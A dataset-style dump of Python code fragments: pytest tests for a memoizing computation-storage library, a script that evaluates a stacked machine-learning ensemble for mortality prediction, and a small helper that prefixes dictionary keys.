storage.where_is(vref=final) assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0] with delete(storage, autodelete=False) as c:", "j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit() with delete(storage=storage) as c:", "nums] with c(mode=MODES.delete) as d: final = mean(x=incs) d.commit_deletions() # check it got", "i in range(10): inc(i) ### drop op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc',", "commits between partitions with run(storage, autocommit=False, partition='first') as c: for i in range(10):", "all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting with a superop ############################################################################ with run(storage,", "0] @superop(storage) def f(lst:TList[int]) -> int: return lst[0] with run(storage, autocommit=True): lst =", "for i in range(10): inc(i) ### drop op with results storage.drop_func(f=inc) assert not", "autocommit=False, partition='first') as c: for i in range(10): inc(i) c.commit() with run(storage, autocommit=False,", "i in range(10, 20): inc(i) assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) ==", "i in range(20, 30): inc(i) c.commit() assert len(storage.call_st.locs()) == 30 storage.drop_uncommitted_calls() assert len(storage.call_st.locs())", "in range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second') as c: for i in", "inc(x:int) -> int: return x + 1 @op(storage) def add(x:int, y:int) -> int:", "remain orphaned ############################################################################ with run(storage) as c: nums = range(10) 
incs = [inc(x)", "latter part with run(storage=storage) as c: nums = range(10) incs = [inc(x) for", "y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage = Storage() @op(storage) def", "return lst[0] with run(storage, autocommit=True): lst = get_divisors(100) f(lst) with run(storage): lst =", "unit with run(storage, autocommit=False): for i in range(10): inc(i) assert len(storage.call_st.locs()) == 10", "storage.drop_instance_data(answer=True) ### test isolation of commits between partitions with run(storage, autocommit=False, partition='first') as", "Any(), Any() z = add(x, y) df = c.qeval(x, y, z, names=['x', 'y',", "[get_divisors(num) for num in nums] return [elt for divs in divisors_list for elt", "num % x == 0] @superop(storage) def f(lst:TList[int]) -> int: return lst[0] with", "run(storage, autocommit=False) as c: for i in range(10, 20): inc(i) assert len(storage.call_st.locs()) ==", "j in range(10): things.append(add(thing, j)) cur_mean = mean(things) means.append(cur_mean) final = mean(means) c.commit()", "in divs] @op(storage) def inc(x:int) -> int: return x + 1 @superop(storage) def", "do computation again with run(storage=storage) as c: x = add(23, 42) c.commit() with", "with run(storage=storage) as c: nums = range(10) incs = [inc(x) for x in", "c.commit_deletions() for func in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty", "df.shape[0] == 10 storage.call_st.locs() storage.drop_instance_data(answer=True) ############################################################################ ### deleting calls only, verifying vrefs remain", "nums] final = mean(x=incs) c.commit_deletions() assert all(storage.rel_adapter.mis_orphan(locs=inc_locs)) assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0] storage.drop_instance_data(answer=True) ############################################################################ ### deleting", "final = mean(means) c.commit_deletions() for func in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op,", "for i in range(10): inc(i) c.commit() with run(storage, autocommit=False, partition='second') as c: for", "= storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0] == 10", "cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests): storage, cts = setup_tests storage:Storage ### unit with run(storage,", "delete(storage, autodelete=True): add_three(x=23, y=42, z=5) assert not storage.call_st.locs() storage.drop_instance_data(answer=True) def test_superops(): storage =", "work with run(storage=storage) as c: x = add(23, 42) c.commit() ### delete the", "c.commit() # delete only latter part with run(storage=storage) as c: nums = range(10)", "test_bug(): storage = Storage() @op(storage) def get_divisors(num:int) -> TList[int]: return [x for x", "are isolated to prevent schema changes across tests \"\"\" storage = Storage() @op(storage)", "= list(range(20)) concat_divisors(nums=nums) with delete(storage, autodelete=True): nums = list(range(20)) concat_divisors(nums=nums) assert len(storage.call_st.locs()) ==", "Any() z = add(x, y) df = c.qeval(x, y, z, names=['x', 'y', 'z'])", "def concat_divisors(nums:TList[int]) -> TList[int]: divisors_list = [get_divisors(num) for num in nums] return [elt", "means.append(cur_mean) final = mean(means) c.commit_deletions() for func in (inc, add, mean): df =", "at once 
############################################################################ with run(storage=storage) as c: things = [] means = []", "@op(storage) def inc(x:int) -> int: return x + 1 @op(storage) def add(x:int, y:int)", "assert len(storage.call_st.locs()) == 20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test isolation", "func in (inc, add, mean): df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True) assert df.empty assert not", "run a workflow of several parts with run(storage=storage) as c: nums = range(10)", "once ############################################################################ with run(storage=storage) as c: things = [] means = [] for", ".utils import * from .funcs import * from .conftest import setup_tests def test_simple(setup_tests):", "[inc(x) for x in chunk] with run(storage, autocommit=True): nums = list(range(20)) concat_divisors(nums=nums) with", "as c: x = add(23, 42) c.commit_deletions() ### check if things got deleted", "20 storage.drop_uncommitted_calls() assert len(storage.call_st.locs()) == 10 storage.drop_instance_data(answer=True) ### test isolation of commits between", "didn't df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True) assert df.empty df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True) assert df.shape[0]", "inc_locs = [storage.where_is(vref=x) for x in incs] assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs)) final_loc = storage.where_is(vref=final)", "op with results storage.drop_func(f=inc) assert not storage.op_adapter.has_op(ui_name='inc', version='0') # cleanup storage.drop_instance_data(answer=True) def test_drop_uncommitted(setup_tests):" ]
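test_simple and test_drop_uncommitted call inc, add, mean, and add_three imported from .funcs, whose definitions fall outside this excerpt. The sketch below shows plausible definitions against some Storage instance named storage: the inc and add bodies match the ones test_drop_op registers, while the mean and add_three bodies (and add_three being a superop) are assumptions.

# Plausible sketch of the .funcs ops used above; inc and add mirror
# test_drop_op, while mean and add_three are assumed.
storage = Storage()

@op(storage)
def inc(x: int) -> int:
    return x + 1

@op(storage)
def add(x: int, y: int) -> int:
    return x + y

@op(storage)
def mean(x: TList[int]) -> float:  # assumed signature and body
    return sum(x) / len(x)

@superop(storage)
def add_three(x: int, y: int, z: int) -> int:  # assumed: composed of add calls
    return add(add(x, y), z)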
[ "as plt from joblib import dump, load from sklearn.model_selection import * # A", "print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM + NB + RF +", "clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv 1)", "printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM + NB + RF", "in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time)", "clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM + NB", "dump, load from sklearn.model_selection import * # A custom-made library for reporting from", "print(' VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best):", "Dec 2021. ##### BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time = printtimer(time.time())", "', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM", "my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>, MD. Dec 2021.", "MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN +", "reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>, MD.", "', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB +", "# A custom-made library for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer", "i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist())", "DF df_final = load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train, df_test, df_train_label,", "0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv", "library for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written by", "= df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) #", "i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist())", "= load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING 
ENSEMBLE MODEL (Lv 1) ensemble_model", "time import matplotlib.pyplot as plt from joblib import dump, load from sklearn.model_selection import", "start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib') df = df_final[0]", "+ RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION #################", "import * # A custom-made library for reporting from my_eval_functions import set_seeds, get_clf_eval,", "READS DF df_final = load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train, df_test,", "Ensemble [KNN + XGB + SVM + NB + RF + ANN +", "(Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL", "1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM + NB +", "= load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i in", "printtimer # Written by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe, base,", "print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(),", "SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i])", "1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for", "get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM + NB", "+ NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) #################", "print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL", "# READS DF df_final = load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train,", "load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split", "printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib') df = df_final[0] df_label =", "load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') 
print('=========================================================================================') for i in range", "joblib import dump, load from sklearn.model_selection import * # A custom-made library for", "MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB", "matplotlib.pyplot as plt from joblib import dump, load from sklearn.model_selection import * #", "from sklearn.model_selection import * # A custom-made library for reporting from my_eval_functions import", "= load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label =", "print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN", "printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM + NB + RF +", "dataframe, base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final", "get_clf_eval, dingdong, printtimer # Written by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading", "MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE", "clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib')", "for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:,", "train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0) clflist", "TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ',", "##### BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) #", "import time import matplotlib.pyplot as plt from joblib import dump, load from sklearn.model_selection", "BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS", "LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================')", "df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib')", "(0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble", "# READS INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib')", "******************************') print('*****************************************************************************************\\n\\n') 
get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for", "<NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time", "print(' TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best):", "for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:,", "import matplotlib.pyplot as plt from joblib import dump, load from sklearn.model_selection import *", "set_seeds(123) # READS DF df_final = load('df_final.joblib') df = df_final[0] df_label = df_final[1]", "= load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ###", "print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL", "(df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0) clflist =", "READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************')", "SVM + NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist())", "ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING", "ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i", "SVM + NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_test_label.tolist(), ensemble_model.predict_proba(df_test)[:,1].tolist())", "2021. 
##### BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123)", "* # A custom-made library for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong,", "+ SVM + NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_test_label.tolist(),", "TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n*****", "df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv", "VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ',", "+ NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_test_label.tolist(), ensemble_model.predict_proba(df_test)[:,1].tolist()) printtimer(start_time)", "get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in", "print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble", "clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM", "INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN +", "RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************')", "print('Loading dataframe, base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF", "XGB + SVM + NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n')", "range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('**********", "import set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>, MD. Dec 2021. 
#####", "ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION", "from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>, MD. Dec", "and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib')", "INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS", "sklearn.model_selection import * # A custom-made library for reporting from my_eval_functions import set_seeds,", "NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION", "(best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB +", "Written by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe, base, and ensemble", "READS INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') #", "from joblib import dump, load from sklearn.model_selection import * # A custom-made library", "= printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib') df = df_final[0] df_label", "get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB + SVM +", "+ ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print('", "custom-made library for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written", "### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)):", "+ LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n')", "+ XGB + SVM + NB + RF + ANN + LR] ******************************')", "MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') 
print(' TRAINING SET\\n')", "load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model =", "in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time)", "print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(),", "df = df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df,", "df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3,", "by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe, base, and ensemble classifiers')", "INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN", "+ SVM + NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(),", "classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib') df =", "[KNN + XGB + SVM + NB + RF + ANN + LR]", "plt from joblib import dump, load from sklearn.model_selection import * # A custom-made", "NB + RF + ANN + LR] ******************************') print('*****************************************************************************************\\n\\n') get_clf_eval(df_test_label.tolist(), ensemble_model.predict_proba(df_test)[:,1].tolist()) printtimer(start_time) dingdong()", "df_final = load('df_final.joblib') df = df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label", "print('********** Ensemble [KNN + XGB + SVM + NB + RF + ANN", "load('ClassifierNameList.joblib') # READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO", "df_label = df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123)", "clfnamelist[i]) get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM +", "(Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================')", "(0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('**********", "load from sklearn.model_selection import * # A custom-made library for reporting from my_eval_functions", "1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM + NB + RF", "ensemble_model.predict_proba(df_train)[:,1].tolist()) 
################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in range", "ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final = load('df_final.joblib') df", "dingdong, printtimer # Written by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe,", "################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL", "# READS STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT", "import dump, load from sklearn.model_selection import * # A custom-made library for reporting", "random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist =", "print('*****************************************************************************************\\n\\n') get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist()) ################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i", "# Written by <NAME>, MD. Dec 2021. ##### BEGIN print('Loading dataframe, base, and", "df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS", "################# VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)):", "for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>,", "MD. Dec 2021. ##### BEGIN print('Loading dataframe, base, and ensemble classifiers') start_time =", "= df_final[0] df_label = df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label,", "STACKING ENSEMBLE MODEL (Lv 1) ensemble_model = load('EnsembleModel.joblib') ### TO STDOUT print('*****************************************************************************************') print('", "A custom-made library for reporting from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer #", "set_seeds, get_clf_eval, dingdong, printtimer # Written by <NAME>, MD. Dec 2021. 
##### BEGIN", "base, and ensemble classifiers') start_time = printtimer(time.time()) set_seeds(123) # READS DF df_final =", "STDOUT print('*****************************************************************************************') print(' TRAINING SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n***** INDIVIDUAL", "VALIDATION ################# print('*****************************************************************************************') print(' VALIDATION SET\\n') print('=========================================================================================') for i in range (0,len(clflist)): print('\\n*****", "= train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0)", "clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist()) printtimer(start_time) print('********** Ensemble [KNN + XGB + SVM + NB +", "df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL", "df_final[1] df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) # READS", "test_size=0.3, random_state=123) # READS INDIVIDUAL BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist", "BASE MODELS (Lv 0) clflist = load('MortalityOutcomeModels.joblib') clfnamelist = load('ClassifierNameList.joblib') # READS STACKING", "(best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================') print('********** Ensemble [KNN + XGB", "range (0,len(clflist)): print('\\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i]) get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist()) printtimer(start_time) print('=========================================================================================')", "df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123) # READS INDIVIDUAL BASE" ]
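my_eval_functions is the author's custom reporting module and its source is not included here. As a rough illustration only, a get_clf_eval-style helper for a binary classifier typically prints discrimination and threshold metrics from the true labels and predicted probabilities; the sketch below is a hypothetical stand-in built on sklearn.metrics, not the author's implementation.

from sklearn.metrics import accuracy_score, roc_auc_score

def clf_eval_sketch(y_true, y_prob, threshold=0.5):
    # Hypothetical stand-in for get_clf_eval: AUROC on the raw
    # probabilities, accuracy at a fixed decision threshold.
    y_pred = [int(p >= threshold) for p in y_prob]
    print(f'AUROC:    {roc_auc_score(y_true, y_prob):.3f}')
    print(f'Accuracy: {accuracy_score(y_true, y_pred):.3f}')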
[ "from typing import Dict def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys =", "str) -> Dict: keys = [*data.keys()] for key in keys: data[f\"{prefix}_{key}\"] = data.pop(key)", "Dict def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys = [*data.keys()] for key", "add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys = [*data.keys()] for key in keys:", "typing import Dict def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys = [*data.keys()]", "<filename>src/utils.py from typing import Dict def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys", "Dict, prefix: str) -> Dict: keys = [*data.keys()] for key in keys: data[f\"{prefix}_{key}\"]", "prefix: str) -> Dict: keys = [*data.keys()] for key in keys: data[f\"{prefix}_{key}\"] =", "-> Dict: keys = [*data.keys()] for key in keys: data[f\"{prefix}_{key}\"] = data.pop(key) return", "def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys = [*data.keys()] for key in", "import Dict def add_prefix_to_keys(data: Dict, prefix: str) -> Dict: keys = [*data.keys()] for", "Dict: keys = [*data.keys()] for key in keys: data[f\"{prefix}_{key}\"] = data.pop(key) return data" ]
